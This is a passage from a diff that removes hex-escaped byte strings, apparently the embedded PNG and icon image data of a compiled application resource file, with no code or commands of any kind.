-\x04\x35\x6b\x1a\x3f\x4c\xbd\xc1\xf0\xf7\x85\xaa\x0b\x5a\x4f\x2a\ -\x3c\xa8\x90\xac\x0e\x2e\xfd\x99\xcf\x9e\x23\xe9\xf8\x21\x3c\x77\ -\x1f\x8b\x90\x16\x35\x11\x58\xbd\x24\x02\xdf\x29\x45\xec\x98\x2e\ -\x45\x91\x96\x46\x00\xe3\x40\x21\xd8\x37\xed\x51\x9d\x17\x07\xb8\ -\x35\x1f\x17\x2d\x7f\x9e\xd7\x70\xe4\x73\xd4\x17\xf1\xa8\x28\xa2\ -\x15\x5b\x63\x8a\xce\xde\x39\x5e\xfe\x28\xa5\x11\xc5\xeb\xe0\x14\ -\x8d\x26\x8e\xe2\x17\x56\xe2\xf7\xa8\xc2\x96\x87\x03\x0a\x5b\xe0\ -\x40\x9a\xb1\xac\xb1\x53\x94\x8c\x9b\xd1\xbe\xd9\x98\x28\x0c\xa3\ -\x47\xfe\x33\xcc\xf8\x61\xaa\x54\x69\xf1\xc3\xe9\xee\xb0\xb0\xea\ -\x05\x5b\x9b\x3e\x78\xdb\xa6\x3d\xbc\x4b\x94\xc2\x5d\x8a\x50\x7c\ -\xa5\x1a\x48\x0f\x2b\xbe\x56\x0d\xe7\xfe\xf5\xbe\x19\x97\x7c\xb1\ -\xec\x33\x3f\x8c\xe5\xfe\x14\xf3\x0a\xb3\xb2\x70\xa9\x5f\x19\xf7\ -\xc6\x58\x20\x65\xa2\x19\x92\x27\x98\x21\x69\x7c\x71\x24\x8e\x15\ -\x50\xa0\x14\x6f\xc2\x38\x53\x24\xbb\x15\x47\xf2\x24\x13\x3c\xfb\ -\xc6\x04\xce\x9d\xde\x82\x5d\xa9\x6e\xb0\xb4\xfd\x1c\xb6\xa5\x47\ -\xa0\x64\xd9\x91\xa8\x51\xeb\xdf\xfb\xeb\xa9\xd7\x5d\xfa\xf5\x41\ -\x88\x54\xec\x55\x35\x99\x19\xd0\x24\x26\x22\xf5\xfa\x9f\x88\x5a\ -\xf8\x33\x1e\x74\x7b\x9f\xcb\x7b\x25\x04\x55\xa3\x40\x85\x20\xdf\ -\xa1\x30\xe9\x4d\x83\x18\x07\x0a\x8f\x5a\xad\x8c\xf4\xac\x01\x14\ -\x6c\x60\xdd\xb2\x38\xd9\xfa\x9d\x37\x27\x54\x27\x0f\x7f\xb7\x16\ -\xe3\x62\xd0\x60\x14\x19\x21\x04\x1b\x8d\x7a\x14\x60\x3d\xc7\x17\ -\xf2\xd7\xf9\x4d\x28\xbe\x86\x8c\x1b\x50\x98\xe2\x77\xa7\x4d\x98\ -\x16\xbf\x96\x12\x76\x52\xa8\x23\xc5\x6f\x52\x23\xd1\x40\xfc\x26\ -\x55\xfc\xa2\x9f\xb1\xfc\x21\x35\xed\xed\x9d\xa3\xe0\x40\xb1\x0f\ -\xf6\x48\xc2\xa5\x50\xe3\x7b\xd4\x52\xa5\xbe\x3a\x68\x6a\xd1\x0b\ -\xe6\x56\x3d\x60\x6e\xd9\x13\x66\xa4\x94\x75\x47\x7c\x6a\x59\x1b\ -\xdb\x29\xca\x1b\x26\x25\xe0\x5f\x8c\xdb\x01\x13\x33\xee\x55\xb9\ -\x2f\x15\x3f\x4e\xa1\x50\x7f\xa7\x67\x1d\x64\x59\x13\xe5\xec\x3a\ -\xc3\xca\x6e\x00\x9a\xd5\x68\x05\xef\xfe\x25\xf1\x64\xaa\x29\x54\ -\xd3\x4d\x91\xf1\x4d\x71\xa8\xb8\x07\xcd\xf8\xb6\x38\x32\xa6\x9b\ -\xe0\xc9\xb7\x26\x58\xfb\x65\x49\xb4\x6f\xd0\x18\x16\xb6\x03\xe5\ 
[binary resource data omitted: the remainder of this hunk deletes the escaped byte strings of an embedded PNG image and ICO icon from the removed resource file; nothing else is recoverable from the raw bytes]
-\x00\x00\x0f\xff\xff\xff\xf0\x00\x00\x00\x7f\xff\xff\xff\xf0\x00\ -\x00\x00\xff\xff\xff\xff\xe0\x00\x00\x00\x7f\xff\xff\xff\xe0\x00\ -\x00\x00\x7f\xff\xff\xff\xe0\x00\x00\x00\x7f\xff\xff\xff\xe0\x00\ -\x00\x00\x7f\xff\xff\xff\xf0\x00\x00\x00\x7f\xff\xff\xff\xff\x00\ -\x00\x00\x7f\xff\xff\xff\xff\xf8\x00\x00\x7f\xff\xff\xff\xff\xff\ -\xc0\x00\xff\xff\xff\x7f\xff\xff\xfe\x00\xff\xff\xfe\x89\x50\x4e\ -\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x01\ -\x00\x00\x00\x01\x00\x08\x06\x00\x00\x00\x5c\x72\xa8\x66\x00\x00\ -\x40\x4b\x49\x44\x41\x54\x78\xda\xed\xbd\x79\x9c\x1d\xd7\x5d\xe0\ -\xfb\x3d\xe7\x54\xd5\xdd\x7b\x53\x77\x6b\x97\x25\xb5\xb5\x78\x89\ -\xb3\x98\x2c\x24\x84\x90\x0d\xcf\x0c\x90\x47\x20\x31\x84\x10\x18\ -\x60\x58\x27\x0c\x79\x13\xf6\xc9\x83\x07\x0c\x5b\x86\x1e\x96\xc0\ -\x10\xde\x30\x90\x04\x02\x44\x26\x0b\x09\x4c\x20\x2f\x84\x00\x21\ -\x21\x89\x63\x67\xb3\xbc\x45\xb6\x64\x59\x96\xb5\x74\xb7\xba\xfb\ -\x6e\xb5\x9c\x73\xe6\x8f\xba\xb7\xd5\x92\x5a\x52\x4b\xba\xb7\xaa\ -\xee\xed\xfa\x7e\x3e\x6d\x6b\x69\x75\x9d\x5b\x55\xbf\xf5\xfc\x7e\ -\xbf\x23\xc8\xc9\xb9\x01\xb6\xbc\x7d\x16\xbf\x01\x23\xd3\x14\xa4\ -\x62\x02\xc1\x0e\x21\x39\x20\x25\x77\x48\xc5\xcd\x42\x31\x82\x45\ -\xea\x90\x27\x8d\xe1\xdd\x42\xf0\x31\x20\x3c\x72\xf7\x9b\xd3\x5e\ -\xfa\x86\xc4\x5a\x7b\xc1\xef\x45\xe7\x0f\x54\xe7\xf7\x5a\x08\x91\ -\xf6\x1a\x73\x32\xca\x96\xdf\x9e\x65\xf9\x2b\x30\xf5\x02\x0a\x42\ -\x30\x8a\x60\xbb\x90\xec\x96\x92\x5b\x85\xe2\x80\x72\xd8\xa7\x1c\ -\xb6\x2b\x8f\x09\xc7\xa3\xa4\x3c\xa4\xec\xbc\x59\x41\x13\x9a\x0b\ -\x9c\x88\x02\x7e\xd6\x1a\xde\x25\x24\xe4\x4a\x20\x79\x3a\xf2\xee\ -\x01\x16\x08\x9d\x55\x7f\x97\x4b\x7e\xce\x0a\x37\xfd\xc9\x6c\xfc\ -\x0b\x41\x41\x48\xc6\x84\x60\x9b\x90\xcc\x54\xb7\x71\x50\x28\x6e\ -\x55\x0e\x7b\x95\xc3\x4e\xe5\x31\xee\x78\x14\x95\x87\x50\x2e\x48\ -\x15\x7f\x5d\x8c\x5b\x04\xe5\xb1\x7d\xe9\x24\xff\x29\x0a\xf8\x07\ -\xe0\x78\xda\x9f\x71\x03\x13\x76\x7f\xe1\x74\x2c\xbe\x4e\x7b\x45\ -\x39\xe9\xb1\xf3\x8f\x67\x31\x11\xc2\x29\xe2\x75\xdc\xf8\xad\x42\ -\xb2\x4f\x4a\xf6\x4b\xc5\xad\xd2\x61\x46\xb9\x6c\x57\xee\xfa\x84\ -\xfd\x72\x14\x2a\xe0\x55\xb8\x35\x0a\x79\x2e\xb9\x02\x48\x85\x8e\ -\xbc\xaf\xc4\x01\xb9\xd5\xdf\x60\xec\xf8\xa3\x59\x82\x36\xa2\x34\ -\x42\x41\x4a\xc6\x3b\x6e\xfc\x8c\x94\xdc\x2a\x1d\x0e\x48\xc5\x3e\ -\xe5\xb2\xb5\xe3\xc6\x7b\x8e\xdb\x11\x76\x07\x84\xbc\xf1\xeb\x37\ -\x17\x60\xe9\x14\x6f\x51\x1e\xbf\x1c\xf9\x79\x18\x90\x36\xce\x8d\ -\xff\x88\x9c\xac\xb2\xe3\x8f\x67\xb1\x1a\xe1\x96\x28\x0a\xc1\xb8\ -\x90\xec\x10\x82\xbd\xc5\x1a\xb7\x49\xc5\x01\xe9\x32\xa3\x1c\xb6\ -\x39\x1e\xe3\xca\xc3\x73\x3c\x84\x74\x40\xf5\x48\xd8\xd7\x42\x79\ -\x20\x14\xb7\xb7\x97\xf0\x9c\x02\x41\xda\xf7\x68\xa3\x93\x2b\x80\ -\x21\xe1\xa6\x3f\x99\xc5\x5a\x84\x94\x14\x85\x64\x42\x48\xb6\x0b\ -\xc1\x3e\xa1\x38\x20\x25\xb7\x49\x97\xdd\xca\x61\x87\xe3\x31\xaa\ -\x3c\x0a\x8e\x07\x5d\x37\xbe\x5f\xc2\xbe\x16\x8e\x0b\xca\x61\xaf\ -\x90\x8c\x02\x67\xd2\xbe\x6f\x1b\x9d\x5c\x01\x0c\x20\xbb\xde\xd5\ -\x11\x76\x45\x51\x4a\x36\x75\x84\x7d\xbf\x50\x1c\x90\x8a\x5b\xa4\ -\xc3\x5e\xe5\xb2\xcd\x71\x19\x73\x3c\x3c\x95\x92\xb0\xaf\x45\xc7\ -\xc3\xd8\x29\x24\xdb\xc9\x15\x40\xea\xe4\x39\x80\x0c\xa3\xde\x3c\ -\xcb\xee\xe7\x43\x73\x01\x51\xa8\x50\x12\xb1\xb0\xef\x10\x82\x9b\ -\x85\xe2\x56\xa9\xd8\x2f\x1d\x6e\x76\x5c\xb6\x28\xaf\x23\xec\x6e\ -\x76\x84\xfd\x72\x2c\x9d\xa2\x55\x9f\xe3\xf5\x42\xf0\x7e\xc8\xf3\ -\x00\x69\x92\x7b\x00\x19\x62\xe7\x3b\x66\x31\x1a\xe1\x16\x29\x0b\ -\xc1\x84\x90\xec\x02\x66\x2a\x9b\xb8\x4d\x2a\xf6\xab\x38\x1b\xbf\ -\x45\x79\x8c\xae\x58\x76\x27\xdb\xc2\xbe\x16\x8e\x47\x49\x48\x6e\ 
-\x55\x2e\xef\xd7\x79\x16\x20\x55\x72\x05\x90\x12\xbb\xdf\x1d\x6f\ -\xbd\x49\x87\xb2\x90\x6c\x12\x82\x9d\x42\xb2\x5f\x48\x0e\x4a\xc5\ -\x2d\x2a\x8e\xd9\xb7\x29\x8f\xda\x20\x0b\xfb\x25\x88\x38\x11\x28\ -\x15\xb7\xb4\x97\x70\xdd\xe2\xf9\x3d\xe9\x9c\xe4\xc9\x15\x40\x02\ -\xec\xfe\xd3\x59\x8c\x46\x0a\x45\x49\x4a\xa6\x84\x8c\xcb\x65\x9d\ -\x42\x1c\xb3\x2b\x87\xdd\xca\x63\xab\x72\x19\x71\x0a\xb8\xca\x1d\ -\x12\x61\x5f\x0b\xdb\x09\x51\x1c\x6e\x96\x8a\x51\xe0\x6c\xda\x4b\ -\xda\xc8\xe4\x0a\xa0\xc7\xec\x7a\x57\x2c\xec\x8e\x47\x59\x48\x26\ -\x85\x60\x97\x90\xec\x73\xe2\x7d\xf6\xfd\x2a\x4e\xd0\x6d\x56\x2e\ -\xa3\x8e\x87\xe3\x78\x71\x62\x6c\x28\x85\xfd\x32\x48\xb5\x92\x08\ -\xdc\x46\xae\x00\x52\x25\x4f\x02\x5e\x27\xd3\xbf\x3d\x4b\x75\x2b\ -\x04\x0d\xa4\xe3\x51\xed\xb8\xf1\x37\x09\xc9\xcd\x42\x72\x5b\x47\ -\xd8\xf7\x28\x97\xcd\x8e\xc7\x88\xf2\x70\x9c\x4e\x41\x8d\x74\x60\ -\xa3\xb7\x5c\x74\x12\x81\xaf\x13\x82\xbf\x82\x3c\x11\x98\x16\xb9\ -\x07\xb0\x1e\xbe\x73\x96\x99\x57\x43\xd8\x40\x4a\x45\x55\x48\xa6\ -\x84\x60\xa7\x80\x83\xa5\x11\x0e\x88\xd8\x8d\xdf\xa5\x5c\xb6\x3a\ -\x1e\xd5\x15\x61\xef\x66\xe3\x37\xb8\xb0\xaf\x85\xe3\x51\x12\x82\ -\xdb\xa4\xe2\xaf\x4c\x5e\x88\x9e\x1a\xb9\x02\xb8\x88\x4d\xbf\x35\ -\xcb\xd4\x5e\x68\x9e\x43\x49\x45\x45\x48\xa6\x85\x60\x27\x9a\x83\ -\x5e\x99\x83\xca\xe1\xa0\x74\xb8\xc9\xf1\x98\x56\x2e\x35\xc7\xc3\ -\xe9\x26\xe8\x44\x2e\xec\xeb\xe3\x7c\x22\xf0\x80\xdf\xc0\x71\x8b\ -\x44\x69\x2f\x69\xa3\xb2\xa1\x15\xc0\xb6\xff\x39\xcb\xe9\xc7\x61\ -\xeb\x7e\x94\x72\x57\x2c\xfb\xee\xb0\xcd\x3e\xaf\xc2\x6d\x4a\xb1\ -\x4f\x3a\xec\x71\x3c\xa6\x3a\xc2\xae\x2e\x11\x76\xc1\xaa\xd6\x8a\ -\x9c\x75\x71\x3e\x11\x78\x40\x3a\x8c\x91\xe7\x01\x52\x63\xc3\x28\ -\x80\x89\xdf\x98\xe5\x05\x3f\x00\x5f\x7a\x1f\x4a\x79\xd4\x84\x60\ -\x4a\x08\xf6\xdc\xf4\x2c\xf6\xc9\x4e\x51\x8d\x72\xb9\x49\xb9\x4c\ -\x2b\x8f\xaa\xe3\xa1\xba\xd9\xf8\x2b\x0a\x7b\x2e\xfc\xd7\x85\x54\ -\xa0\x5c\xb6\x0b\xc1\x16\x72\x05\x90\x1a\x43\xaa\x00\x66\xd9\x7b\ -\x08\x74\x80\x23\x24\x55\x21\xd8\x2c\x04\x37\x3d\xfc\xb7\x1c\x2c\ -\xd6\x3a\x5b\x6f\x2e\x3b\x3b\xc2\x5e\xc9\x85\x3d\x79\xa4\x04\xc7\ -\x63\x93\x90\xdc\x8c\xe0\xcb\x69\xaf\x67\xa3\x32\xf0\x0a\x60\xcf\ -\x9f\xcd\x12\x45\xa0\x14\x0e\x50\x15\x92\x2d\x42\x70\x93\x80\x83\ -\x5e\x89\x83\xd2\xe1\x40\x27\x41\x37\xd5\xb1\xec\xf2\x12\x61\x5f\ -\x8b\x5c\xd8\xfb\x4b\x9c\x07\x28\x09\xc1\x01\xa5\x60\xe6\xd0\x6c\ -\xbe\x13\x90\x02\x03\xad\x00\xf6\xbe\x67\x16\x01\x63\xae\xe2\x65\ -\x52\xf1\xf5\xca\x65\x7f\xa7\xa8\x66\x93\xe3\x52\x55\x1e\xd2\xf1\ -\x3a\x99\xf8\x3c\x41\x97\x39\x3a\xcf\xe6\xd6\x76\x3d\xaf\x08\x4c\ -\x8b\x81\x55\x00\x33\x87\x66\xc1\x32\x8a\xe0\x57\x8a\x15\xbe\xbb\ -\x34\x4a\xd9\x2d\x9e\x1f\x5c\x91\x27\xe8\xb2\x4f\x27\x11\xb8\x5f\ -\x3a\x8c\x00\x73\x69\xaf\x67\x23\x32\x90\x0a\x60\xe6\xd0\x2c\x42\ -\x80\xb5\xbc\xa6\x50\xe5\x7b\x46\xb7\x50\x54\xdd\x31\x87\xab\xc9\ -\x85\x3f\xd3\x5c\x94\x08\xcc\x15\x40\x0a\x0c\x6c\xf1\x69\xbb\x81\ -\x92\x0e\x2f\x28\x8f\x5d\x46\xf8\x73\x32\x8f\x94\xa0\x5c\x26\x85\ -\x60\x26\xed\xb5\x6c\x54\x06\x56\x01\x60\x51\xd2\x61\x2c\x17\xfe\ -\x01\x46\x80\x53\xa0\x24\x14\x07\x94\xdb\x09\xeb\x72\x12\x65\x60\ -\x15\x80\x10\x58\x6b\x30\x98\xb4\x57\x92\x73\x23\x38\x2e\x48\xc9\ -\xed\xed\xe5\xc1\x0c\x47\x07\x9d\x81\x55\x00\xe3\x3b\x08\x8d\xe6\ -\x09\x1d\x92\xb7\x34\x0d\x30\x2a\xee\x86\x9c\x91\x8a\x91\xb4\xd7\ -\xb2\x11\x19\x48\x05\x70\xe4\xee\x37\xd3\x5c\x00\xa3\x79\x38\x0a\ -\xb0\x79\x08\x30\xb8\x74\x12\x81\xbb\x84\x64\x6b\xda\x6b\xd9\x88\ -\x0c\xa4\x02\x00\xb0\x16\xac\xe1\xc1\x28\x60\xd1\xe6\x0a\x60\x60\ -\xe9\x24\x02\xc7\x85\x60\x07\xe4\x79\x80\xa4\x19\x58\x05\x00\x80\ 
-\xe5\xb8\x0e\x38\x63\xf3\x76\xd2\xc1\x45\x80\xe3\xe2\x09\xc9\xf8\ -\x46\x19\x88\x92\x25\x06\xfa\x96\x1b\xc3\x59\x1d\x71\x44\xe7\xcd\ -\xa4\x83\x8e\x05\x4c\x1e\xca\x25\xcf\x40\x2b\x80\x37\xbe\x9e\xa6\ -\x89\x78\x28\x0a\xc8\x13\x81\x03\x8a\xb5\x10\xf9\x44\xd6\xe4\xa1\ -\x5c\x1a\x0c\xac\x02\x38\x72\xf7\x9b\xf9\x83\xbf\x04\x6b\x78\x40\ -\x07\xb9\xf5\x18\x38\xe2\x4a\x4e\x5a\x8b\xd0\x6e\xf0\x30\xf0\x50\ -\xda\x4b\xda\x88\x0c\xf4\xde\xab\xb5\x60\x0c\x0f\x47\x01\x75\x6b\ -\x19\xc9\x9b\x7d\x32\x4a\xa7\x27\xc3\x5a\xb0\x1a\x74\x04\x91\x0f\ -\x41\x0b\xdd\x5e\xe6\xcb\x26\xe4\x2d\x5e\x85\x63\x61\x2b\x9f\x0d\ -\x98\x34\x03\xad\x00\x00\xb0\x3c\xa1\x03\x4e\x59\xcd\x88\x18\xfc\ -\x4f\x33\xf8\xac\x21\xec\x3a\x80\xd0\xc7\xea\x80\x46\x14\x32\x6f\ -\x22\x8e\x99\x88\xaf\x18\xc3\xbd\xc0\xdf\x4b\xc9\x23\xb9\xf0\xa7\ -\xc3\xc0\x8b\x8c\x31\x9c\xd1\x11\x8f\xe9\x88\x7d\x72\xe0\x3f\xcd\ -\x80\xd1\xf5\xb8\x2c\x18\x1d\x0b\x7a\x14\x42\xe4\x63\x74\x40\x33\ -\x0a\x39\x6b\x22\x8e\x9b\x88\x87\xad\xe1\x21\x6b\x39\x6c\x2d\xc7\ -\xb0\x9c\x04\x96\x11\x44\xd6\xc0\x63\xaf\xcf\x05\x3f\x2d\x06\x5e\ -\x64\x96\x9f\xa6\xe9\xee\xe6\x61\x1d\x70\x97\x5b\x22\xef\x0b\xe8\ -\x17\xab\x84\xdd\x9a\x8e\xc0\xc7\xc2\x4e\xe8\x43\xd8\x26\xd4\x21\ -\xf7\x59\xcd\x17\x3a\xc2\xfe\x90\xb5\x3c\x0e\x9c\x02\x96\x5c\x17\ -\xbd\xbc\x04\x27\xbf\x37\x17\xf6\x2c\x31\xf0\x0a\x60\x7c\x17\x58\ -\xcd\x97\xa3\x38\x11\x38\xb0\x49\xcd\x4c\xb1\x86\xb0\x47\xc1\x8a\ -\x2b\xbf\x62\xe9\x4d\x14\xff\x7d\xe7\x7b\x35\xf0\x3b\xe7\x4e\xf1\ -\xe7\x73\x7f\x89\xbd\xe9\xfb\xe1\xd8\x1b\x72\x61\xcf\x3a\x03\x9f\ -\x36\x9b\x39\x34\x8b\x31\xbc\xa4\x32\xce\x87\x46\xb7\x52\xcb\x13\ -\x81\xd7\xc8\xc5\xc2\x1e\xc5\xc2\xdd\x15\xf6\x28\x88\x2d\xfd\x45\ -\xc2\x7e\xe9\x9b\x13\xc7\xfe\x3f\x8b\xe0\x57\xb1\x79\x3c\x3f\x28\ -\x0c\xbc\x07\x00\x80\xe1\xa8\x0e\x79\xda\x1a\x6a\x42\xa5\xbd\x98\ -\x0c\x73\x91\xb0\xeb\x08\x4c\x08\x61\x10\xbb\xf2\x91\xdf\xf9\xb3\ -\xae\xb0\xdb\x8b\xfe\x1d\x97\xf9\xfd\x79\x6e\xc3\xe2\x01\xf9\x99\ -\xbf\x03\xc2\x50\x28\x00\x6b\x38\xab\x43\x8e\xe9\x90\x7d\x32\x57\ -\x00\x31\x6b\x08\xbb\x0e\x63\x8b\xbe\x22\xec\x61\xec\xde\x5f\xd6\ -\xb2\x5f\x8b\x37\x15\x2b\x8b\x19\x60\x84\x7c\xcc\xf7\xc0\x30\x14\ -\x0a\xe0\x25\xaf\xa7\xf1\x2f\xef\xe5\xb0\x0e\x79\xc5\x86\x4c\x04\ -\xae\x9a\x7d\xb8\xda\x8d\x8f\x02\x88\xda\xab\xdc\x78\x7d\xde\xb2\ -\xaf\x69\xdc\xd7\x10\xf8\x95\x90\x4a\x5c\x3a\x54\x75\xa5\x72\xaf\ -\xb3\xed\x87\x65\xaf\xb5\xbc\xd2\x5a\x3e\xb1\xfb\xdd\xb3\x73\x3a\ -\xa4\x25\x1d\xec\xb1\xef\xcc\xc3\x81\xac\x32\xf0\x11\xf3\x4a\xf7\ -\x98\xe5\x07\x6b\xd3\xfc\x7e\x75\x72\xf0\x3f\xd3\x15\xb9\x9c\x65\ -\xef\x58\xf5\x0b\x62\x76\x7b\x5e\x48\x85\x38\x3f\x2c\x55\xc8\xb8\ -\x0b\x4f\x74\x4e\x24\xee\xfe\x5e\xae\xfa\xfd\xca\x97\xb8\x70\xc8\ -\xea\xaa\xcb\x9f\xdf\xef\xb7\x1d\xa5\xd3\xc6\x46\x01\x8b\x3a\xe2\ -\xb8\xd1\x3c\x6e\x0d\x0f\x5a\xcd\x83\xc6\x72\x18\xc3\x31\xa3\x99\ -\xf7\x2a\x44\x8f\xfe\x6f\xe0\x0f\x73\xa5\x90\x05\x86\x42\x58\x66\ -\x0e\xcd\x62\x0d\x5f\x57\x1e\xe7\x83\x63\x5b\xa9\x0d\xc7\xa7\xe2\ -\x9a\x85\x1d\x3a\xc2\xac\x3a\x5f\x4e\x67\xe2\x4e\xe7\x44\x62\xe5\ -\x9c\x9f\x9a\x2c\x3b\x02\xbe\x22\xd4\xd7\xeb\xfa\xaf\x66\x75\x6e\ -\xe1\xfc\x5a\xc3\x28\x60\x2e\x0a\x38\xa6\x43\x3e\x67\x35\xf7\x1b\ -\xc3\xfd\xc0\x31\x6b\x98\x07\xcc\xd1\xbc\x0e\x20\x35\x86\x42\x54\ -\x66\x0e\xcd\x62\x22\x76\x17\x47\xf8\xe8\xf8\x0e\x66\x06\x32\x0f\ -\x70\x91\x1b\x7f\x89\xb0\x77\x63\x76\x13\x0b\xbb\x10\xe7\x05\xda\ -\xf1\xe2\x11\xdb\xdd\x73\x0b\xa5\xb3\xca\x9a\xaf\x72\xe1\xe3\x1f\ -\x9e\xfc\x47\xb3\x66\x55\xcd\x40\x9b\x28\xf4\x39\xab\x03\xbe\xa2\ -\x43\x3e\x69\x0c\x9f\xb4\x86\xfb\xb0\x9c\x02\x02\x04\x3c\xfe\xba\ 
-\x5c\x21\x24\xc5\xd0\x28\x00\x1d\x52\xf5\xca\x7c\x60\x7c\x07\x2f\ -\x77\x8b\x69\xaf\xe8\x2a\xac\x12\x76\xa3\x57\x55\xd1\x05\xab\x2c\ -\x7b\x10\x0b\x3b\x36\x76\xd5\x55\x47\xd0\x1d\x0f\x54\xa1\x23\xf0\ -\xab\x04\x7d\xe5\xe7\x42\xe6\x73\x20\xdd\xcf\x1b\xb6\xb1\x41\x93\ -\x46\x14\xf0\x58\x14\x70\xaf\xd1\xfc\xff\x58\x3e\x6d\x34\x4f\x08\ -\x89\xce\x15\x41\xff\x19\x1a\x05\xf0\xe3\xaf\x85\xd9\xf7\xf2\xb6\ -\xb1\x6d\xbc\xb1\x38\x42\x76\x84\x60\xbd\xc2\xae\x3b\x96\x3d\x9e\ -\x90\x83\xe3\x81\x5b\x04\xa7\xd0\x39\x41\xc7\x89\xdd\x76\x86\xec\ -\xc0\x93\xae\xb7\x13\xb6\xc0\x6f\xd2\x0a\x9b\x3c\xaa\x43\x3e\x66\ -\x34\x1f\xb1\x96\xcf\x0a\xc1\x9c\xb5\xd8\x5c\x19\xf4\x87\xa1\x50\ -\x00\x00\x37\xdf\x33\x8b\x35\xfc\x48\x6d\x9a\xdf\xab\x4e\xa6\xb4\ -\x88\x8b\x63\xf6\x70\x8d\xad\xb7\xe8\xc2\xa2\x1a\x11\xcf\xc4\xc3\ -\x2d\x9e\xff\x52\xdd\xe3\xcc\x86\x4c\xd8\xaf\x46\x67\x36\x00\x41\ -\x0b\x82\x3a\x8b\x61\x9b\xcf\xeb\x90\xf7\x5b\xcb\x87\x81\xa3\x40\ -\xf0\xd8\xb7\xe7\x8a\xa0\x97\x0c\x8d\x02\xe8\x26\x02\x2b\x13\x7c\ -\x70\x74\x4b\x02\x89\xc0\xb5\x62\xf6\x60\x0d\x61\xef\x6c\xbd\xad\ -\xce\xc6\x2b\x37\xb6\xec\x5e\x29\xfe\x52\x05\x50\x8a\xa1\xb3\xee\ -\x37\x82\xd1\x10\xb6\xa1\xbd\x4c\x18\x34\x79\x3c\x0a\xf8\xa8\xd5\ -\xdc\x03\x7c\x16\x41\xc3\x5a\x78\x3c\x57\x06\x37\xcc\x50\x29\x00\ -\x13\xb1\xb7\x93\x08\xdc\xd3\xd3\x44\xe0\x95\xdc\xf8\x76\xa7\x74\ -\xf6\xa2\x7d\xf6\x0b\xfe\x79\xc7\xad\x77\x4b\x50\xa8\x74\xac\xbc\ -\xbb\x2a\x76\xcf\xb9\x3c\x36\xbe\xbf\xfe\x32\xb6\x5d\xe7\x6c\xd8\ -\xe2\xa3\xc6\x70\x0f\x96\x7f\x92\x8a\x39\x1d\xc2\xe3\xdf\x91\x2b\ -\x82\xeb\x65\xa8\x14\x80\x0e\xa8\x7a\x55\x3e\x30\xb1\x83\x97\x3b\ -\x85\x1b\xb8\x1b\x6b\x09\xbb\x7f\xbe\x11\x66\xb5\x65\x5f\xb3\xa2\ -\xa6\x53\x51\xa7\x5c\xf0\xca\x50\xa8\x76\x2c\xbd\xc3\x10\xdd\xf1\ -\xe4\xd1\x21\xf8\x0d\xf0\xeb\x34\xfc\x26\x9f\x30\x11\xef\xc4\xf2\ -\x91\xa0\xc5\x9c\x5b\xc8\x15\xc1\xf5\x30\x34\xaf\xe3\xcc\xa1\x59\ -\x1a\x73\x88\xea\x24\xbf\x33\xb2\x85\x37\x96\xc7\x59\xb7\x2b\xbd\ -\xba\x7a\xce\x9a\x8e\x65\x0f\x40\xaf\x8e\xd9\x2d\x5c\xb6\x36\x7e\ -\x15\x52\xc5\x96\xbe\x58\x05\xaf\x12\xef\xc3\x23\xd7\xbf\x96\x9c\ -\xab\x63\x74\xac\x08\xda\x4b\x34\x82\x26\x9f\xd2\x11\x7f\x8e\xe5\ -\x83\x42\x71\xd6\x6a\xc8\xf3\x04\xeb\x67\x68\x14\x00\x74\xf2\x00\ -\x96\x57\x17\x2a\xbc\x73\x74\x0b\x35\xa7\xbb\x1d\xb8\x4a\xf8\xba\ -\xc2\xae\xa3\x95\x0c\x7c\x3b\x0a\x38\xa7\x43\x9e\x8c\x02\x0a\xd6\ -\x72\x3b\x16\xb1\x66\xc7\xdb\x5a\x74\xbe\xcf\xf1\x62\x4b\x5f\xac\ -\xc5\x2e\x7e\xee\xde\xf7\x1f\xa3\x21\x68\x42\x6b\x91\x76\xd0\xe4\ -\xe3\x3a\xe2\x1d\x58\x3e\x82\x60\x01\xe0\xb1\x6f\xcb\x15\xc1\xd5\ -\x18\x3a\x05\x80\xa5\x86\xe0\x2d\x5e\x89\x1f\x2a\x8d\x31\xe2\x78\ -\xb1\xf5\xd6\x21\x36\x0a\x08\x74\xc0\xbc\x0e\x79\x4a\x47\x3c\x6a\ -\x35\x0f\x1b\xc3\x61\x6b\x38\x62\x2d\xc7\x94\xc3\x37\x01\x6f\x07\ -\xbc\xf5\x5c\x6f\xc5\xda\xd7\xe2\xd8\x5e\xb9\x69\xdf\x81\x8d\x49\ -\xd7\x23\x68\x2d\xd2\x08\x9a\x7c\xd4\x68\xde\x8e\xe5\xe3\x08\xda\ -\xb9\x12\xb8\x32\x43\xa5\x00\x00\x66\xde\x33\x0b\x50\xb6\xf0\xf5\ -\x52\xf1\x5c\xa9\xa8\x74\xe6\xd3\x9d\x31\x86\x47\xac\xe1\x2b\x58\ -\x9e\x32\x9a\x85\xb0\x4d\x20\x9d\x58\x78\x3b\x3c\x1f\xc1\x07\x81\ -\xe9\x35\x5d\xf6\xce\x3e\x7d\xd7\xda\x17\xaa\xb9\xb5\xcf\x12\x46\ -\x43\x7b\x09\x9a\x8b\x9c\x09\xdb\xbc\xdf\x1a\xfe\x50\xc0\x7d\x16\ -\x74\xae\x08\xd6\x66\xe8\x14\x40\x97\xb1\xff\x77\x16\xab\xc1\x19\ -\x47\x08\x09\xd2\xc1\x5a\x0b\x67\x7e\x74\xed\x17\xa1\xd3\x54\xb4\ -\x03\xf8\x1b\xe0\x8e\x8b\xff\x5e\xaa\x38\xa1\x57\xac\xc5\xb1\xfd\ -\x4a\x42\x2f\x8f\xed\x33\x87\x0e\xa1\xb5\x88\x6d\x2d\x72\x34\xf4\ -\x79\x3b\x96\x3f\x93\x8a\x13\xd6\x60\x8f\xe4\x8a\xe0\x02\x86\x56\ 
